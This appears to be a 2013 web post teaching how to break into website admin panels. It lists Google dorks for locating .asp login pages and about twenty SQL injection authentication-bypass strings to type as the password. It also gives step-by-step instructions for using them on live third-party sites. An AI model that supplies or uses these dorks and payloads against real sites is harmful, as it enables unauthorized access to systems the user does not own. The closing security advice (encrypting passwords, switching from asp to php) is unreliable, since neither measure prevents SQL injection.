Hack Website Using SQL Injection - TopicsExpress



          

Hack Website Using SQL Injection

Q: What is SQL injection?
A: Injecting SQL queries into another database, or using queries to get authentication bypass as an admin.

Basic SQL injection: gaining authentication bypass on an admin account.

Most sites vulnerable to this are .asp. So first we need to find a site; start by opening Google. Now we type our dork (definition of "dork": a search entry for a certain type of site/exploit). There is a large number of Google dorks for basic SQL injection. Here are the best:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now, what to do once we get to our site. The site should look something like this:

Welcome to xxxxxxxxxx administrator panel
Username :
Password :

So what we do here is: in the username we always type "Admin", and for our password we type our SQL injection. Here is a list of SQL injections:

' or '1'='1
' or 'x'=x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'=x
" or "x"="x
') or ('x'=x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'=a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

TYPE ANY ONE OF THESE IN PASSWORD SPACE...

There are many more, but these are the best ones that I know of. What this SQL injection is doing: confusing the database till it gives you authentication bypass. So your input should look like this:

username: Admin
password: 'or'1'='1

So click submit and you're in.

NOTE: not all sites are vulnerable.

HOW TO SECURE YOUR SITE FROM THIS ATTACK
1- Put encryption on the passwords.
2- Change the platform of your website from asp to php.

M.A S.E.T ....... your choice to be expert
Posted on: Tue, 29 Oct 2013 13:46:23 +0000
